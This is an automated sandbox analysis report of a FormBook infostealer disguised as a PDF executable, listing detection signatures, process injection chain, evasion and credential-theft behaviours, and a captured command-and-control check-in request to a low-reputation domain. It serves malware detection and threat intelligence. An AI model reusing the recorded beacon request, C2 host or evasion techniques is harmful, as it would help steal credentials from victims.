Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe

Overview

General Information

Sample name:HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
Analysis ID:1569166
MD5:0f4c38f8def111c7fdb237b985c66ca0
SHA1:18add6ba22e3c62913161dd98a39458a9e753713
SHA256:b06fc744b4cfd48aeda3eabc2cba8a079b02a9d908920b6944130c6b950e8891
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe (PID: 2324 cmdline: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe" MD5: 0F4C38F8DEF111C7FDB237B985C66CA0)
    • svchost.exe (PID: 7244 cmdline: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe" MD5: B7C999040D80E5BF87886D70D992C51E)
      • RAVCpl64.exe (PID: 7548 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • newdev.exe (PID: 3352 cmdline: "C:\Windows\SysWOW64\newdev.exe" MD5: 775D479963E7ED5969665E44D8859438)
          • firefox.exe (PID: 2788 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.6565186036.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.6805063902.0000000004830000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.6571557042.0000000006630000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.6804979638.00000000047E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Uncommon Svchost Parent Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe", CommandLine: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe", CommandLine|base64offset|contains: B, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe", ParentImage: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, ParentProcessId: 2324, ParentProcessName: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe", ProcessId: 7244, ProcessName: svchost.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe", CommandLine: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe", CommandLine|base64offset|contains: B, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe", ParentImage: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, ParentProcessId: 2324, ParentProcessName: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe", ProcessId: 7244, ProcessName: svchost.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-05T15:21:49.570313+010020507451Malware Command and Control Activity Detected192.168.11.2049739172.67.134.4280TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeReversingLabs: Detection: 47%
              Yara detected FormBook
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.6565186036.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.6805063902.0000000004830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.6571557042.0000000006630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.6804979638.00000000047E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Machine Learning detection for sample
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeJoe Sandbox ML: detected
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: Binary string: wntdll.pdbUGP source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6124352718.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6122007860.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.6566665422.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6481941965.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6484713548.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.6566665422.0000000003D2D000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6805398379.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6565523666.00000000047EB000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6805398379.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6570069236.0000000004993000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6124352718.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6122007860.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.6566665422.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6481941965.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6484713548.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.6566665422.0000000003D2D000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, newdev.exe, 00000003.00000002.6805398379.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6565523666.00000000047EB000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6805398379.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6570069236.0000000004993000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: NewDev.pdbGCTL source: svchost.exe, 00000001.00000003.6534482142.000000000362A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6534458151.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6534284497.000000000361B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: NewDev.pdb source: svchost.exe, 00000001.00000003.6534482142.000000000362A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6534458151.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6534284497.000000000361B000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00386CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00386CA9
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003860DD FindFirstFileW,DeleteFileW,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003860DD
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003863F9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,0_2_003863F9
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0038EB60 FindFirstFileW,FindNextFileW,FindClose,0_2_0038EB60
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0038F56F FindFirstFileW,FindClose,0_2_0038F56F
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0038F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_0038F5FA
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00391B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00391B2F
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00391C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00391C8A
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00391F94 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00391F94
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov ebx, 00000004h1_2_04D104CE
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4x nop then mov ebx, 00000004h2_2_032A64CE
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 4x nop then mov ebx, 00000004h3_2_049304CE

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49739 -> 172.67.134.42:80
              Performs DNS queries to domains with low reputation
              Source: DNS query: www.topkapiescortg.xyz
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00394EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00394EB5
              Source: global trafficHTTP traffic detected: GET /cz1i/?XV=QNGNUsgi9ans25&VT3s=lCWtxBlDPSCNJhRz7147v4YzJ6rIzSVGmK+Kme085vCDtUrqSJqQP+YtwYINSw3lRTDSNZCzyCPLZyeariLf2RdsyM6VIL0C/A8nWtsFZVjXlXjChXabsak= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.topkapiescortg.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
              Source: global trafficDNS traffic detected: DNS query: www.topkapiescortg.xyz
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 14:21:49 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gZH5wQpO6H194y%2BaZLyRpkLRI4RSMTwlhkgwSjKBdBM9q02tes%2FcoywC%2BSCIf%2FirNo%2FJkMTOUthCWHLX6lHxA73c4cH44sRjzMAa5b4iBJOWbQr1JtAlFNzad8h%2FEO%2FHT6EXLeqbxkXO"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ed4af4eda1d3346-MIAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=124553&min_rtt=124553&rtt_var=62276&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=480&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: E8-03HaL.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6752649694.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, E8-03HaL.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: E8-03HaL.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
              Source: newdev.exe, 00000003.00000003.6743657382.0000000000B82000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6743657382.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6803895083.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6743835728.0000000000BA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
              Source: newdev.exe, 00000003.00000003.6743657382.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6803895083.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6743835728.0000000000BA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
              Source: newdev.exe, 00000003.00000003.6743657382.0000000000B8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
              Source: newdev.exe, 00000003.00000003.6743657382.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6803895083.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6743835728.0000000000BA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
              Source: newdev.exe, 00000003.00000002.6803895083.0000000000B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
              Source: newdev.exe, 00000003.00000003.6742668125.0000000007E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
              Source: newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6752649694.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, E8-03HaL.3.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
              Source: newdev.exe, 00000003.00000003.6752649694.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, E8-03HaL.3.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: newdev.exe, 00000003.00000003.6752649694.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, E8-03HaL.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00396B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00396B0C
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00396D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00396D07
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00396B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00396B0C
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00382B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00382B37
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003AF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_003AF7FF

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.6565186036.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.6805063902.0000000004830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.6571557042.0000000006630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.6804979638.00000000047E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Binary is likely a compiled AutoIt script file
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: This is a third-party compiled AutoIt script.0_2_00343D19
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2f7b9e90-6
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: 7SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0ee99350-b
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_17bafc97-f
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8c4455c6-c
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C743 NtClose,1_2_0042C743
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BC0 NtQueryInformationToken,LdrInitializeThunk,1_2_03C72BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72A80 NtClose,LdrInitializeThunk,1_2_03C72A80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72EB0 NtProtectVirtualMemory,LdrInitializeThunk,1_2_03C72EB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D10 NtQuerySystemInformation,LdrInitializeThunk,1_2_03C72D10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C734E0 NtCreateMutant,LdrInitializeThunk,1_2_03C734E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C74260 NtSetContextThread,1_2_03C74260
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C74570 NtSuspendThread,1_2_03C74570
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BE0 NtQueryVirtualMemory,1_2_03C72BE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B80 NtCreateKey,1_2_03C72B80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B90 NtFreeVirtualMemory,1_2_03C72B90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B00 NtQueryValueKey,1_2_03C72B00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B10 NtAllocateVirtualMemory,1_2_03C72B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B20 NtQueryInformationProcess,1_2_03C72B20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AC0 NtEnumerateValueKey,1_2_03C72AC0
